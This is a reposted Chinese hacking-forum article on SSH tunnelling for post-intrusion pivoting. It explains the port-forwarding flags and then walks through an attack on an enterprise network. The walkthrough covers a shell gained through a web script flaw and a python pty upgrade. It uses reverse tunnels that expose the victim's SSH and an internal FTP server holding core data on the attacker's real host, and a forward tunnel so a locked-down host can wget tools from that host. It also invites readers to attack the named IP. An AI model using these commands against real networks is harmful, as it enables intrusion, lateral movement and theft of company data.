深入SSH隧道(depth of ssh Tunnel) (转)

转:http://www.hx95.com/Article/Tech/200909/29501.htm

深入SSH隧道(depth of ssh Tunnel) www.hxhack.com 阅读:109 时间:2009-9-3 1:10:39 整理:华夏黑盟 ------------------------------------------------------------------

在渗透测试过程中，经常遇到如下情形，内部网络主机通过路由器或者安全设备做了访问控制，无法通过互联网直接访问本地开放的服务，Windows方 面，国内通常选择Lcx.exe来进行端口转发，在应用方面大多数人也会选择reDuh来进行端口转发，而*nix却很少人用系统自带的ssh、 iptables自身来处理此类问题。 由于时间有限，本文只详细的介绍ssh tunnel方面的知识,iptables的有空在加上。 SSH的三个端口转发命令： ssh -C -f -N -g -L listen_port:DST_Host:DST_port user@Tunnel_Host ssh -C -f -N -g -R listen_port:DST_Host:DST_port user@Tunnel_Host ssh -C -f -N -g -D listen_port user@Tunnel_Host -f Fork into background after authentication. 后台认证用户/密码，通常和-N连用，不用登录到远程主机。 -p port Connect to this port. Server must be on the same port. 被登录的ssd服务器的sshd服务端口。 -L port:host:hostport 将本地机(客户机)的某个端口转发到远端指定机器的指定端口. 工作原理是这样的, 本地机器上分配了一个 socket 侦听 port 端口, 一旦这个端口上有了连接, 该连接就经过安全通道转发出去, 同时远程主机和 host 的 hostport 端口建立连接. 可以在配置文件中指定端口的转发. 只有 root 才能转发特权端口. IPv6 地址用另一种格式说明: port/host/hostport -R port:host:hostport 将远程主机(服务器)的某个端口转发到本地端指定机器的指定端口. 工作原理是这样的, 远程主机上分配了一个 socket 侦听 port 端口, 一旦这个端口上有了连接, 该连接就经过安全通道转向出去, 同时本地主机和 host 的 hostport 端口建立连接. 可以在配置文件中指定端口的转发. 只有用 root 登录远程主机才能转发特权端口. IPv6 地址用另一种格式说明: port/host/hostport -D port 指定一个本地机器 “动态的'’ 应用程序端口转发. 工作原理是这样的, 本地机器上分配了一个 socket 侦听 port 端口, 一旦这个端口上有了连接, 该连接就经过安全通道转发出去, 根据应用程序的协议可以判断出远程主机将和哪里连接. 目前支持 SOCKS4 协议, 将充当 SOCKS4 服务器. 只有 root 才能转发特权端口. 可以在配置文件中指定动态端口的转发. -C Enable compression. 压缩数据传输。 -N Do not execute a shell or command. 不执行脚本或命令，通常与-f连用。 -g Allow remote hosts to connect to forwarded ports. 在-L/-R/-D参数中，允许远程主机连接到建立的转发的端口，如果不加这个参数，只允许本地主机建立连接。注：这个参数我在实践中似乎始终不起作用) 如果想要了解更多关于SSH的细节，可以 man ssh ，或参照ssh的DOC. 实例： ------------------------------------------------------------------------------ 当骇客A从互联网入侵了RISUN企业的一台服务器，机器名称为 GBOSS_WEB GBOSS_WEB 信息： 外网IP：255.25.55.111 内网IP：10.168.0.10 网络架构方式为，路由将外网256.25.56.111的80端口映射到内网10.168.0.10的80端口上。 骇客A通过利用80端口开放服务的WEB脚本漏洞，成功继承到GBOSS_WEB的httpd权限，然后通过perl或者其它语言创建SOCKET获得一 个远程sh shell。由于back回来的shell可能不稳定，或者使用起来不方便，可以采用SSH建立一个隧道，将GBOSS_WEB服务器上的22端口映射至 骇客的本机上(本文章用于演示的骇客机为0x.cn)； 通过得到的sh shell，执行 $python -c 'import pty; pty.spawn("/bin/sh")' 获得一个ttyshell(因为ssh想要tty的支持)，然后通过如下命令，映射GBOSS_WEB服务器的22端口至202.65.208.142的44端口； $ssh -C -f -N -g -R 44:127.0.0.1:22 ring04h@202.65.208.142 这样登录0x.cn的ssh服务，ssh -p 44 127.0.0.1 等同于连接GBOSS_WEB的22端口。 骇客A通过利用操作系统系统提升权限至ROOT，再继续渗透过程中，发现内网还存在另外一台名称为GBOSS_APP的服务器。 GBOSS_APP 信息： 内网IP：10.168.0.20 骇客通过嗅探获取了GBOSS_APP服务器的FTP信息，GBOSS_APP服务器FTP保存有RISUN企业的核心数据，由于数据量庞大，需要FTP续传功能，可通过SSH映射GBOSS_APP的21端口至0x.cn的2121端口； $ssh -C -f -N -g -R 2121:10.168.0.20:21 ring04h@202.65.208.142 当骇客成功root掉内网中另一网段中的服务器BILL_APP时，需要从外网下载一些工具，由于内部访问控制策略，BILL_APP无法连接网，此时可 以通过映射外网服务器0x.cn的80端口至GBOSS_WEB的8888端口，然后通过GBOSS_WEB建立的隧道，下载所需工具。 在GBOSS_WEB服务器上执行： $ssh -C -f -N -g user@10.168.0.10 -L 8888:202.65.208.142:80 通过建立隧道后，在BILL_APP上执行 wget http://10.168.0.10:8888/thepl 等同于访问http://202.65.208.142/thepl 本文详细的概述了如何建立隧道的过程，以及相关参数的使用方法，各位懂的高手可以直接飘过。 本文中骇客所使用的地址为真实IP，对应域名：http://0x.cn 欢迎无聊的骇客们破坏。(SSH有个隐藏的密码，很容易的...)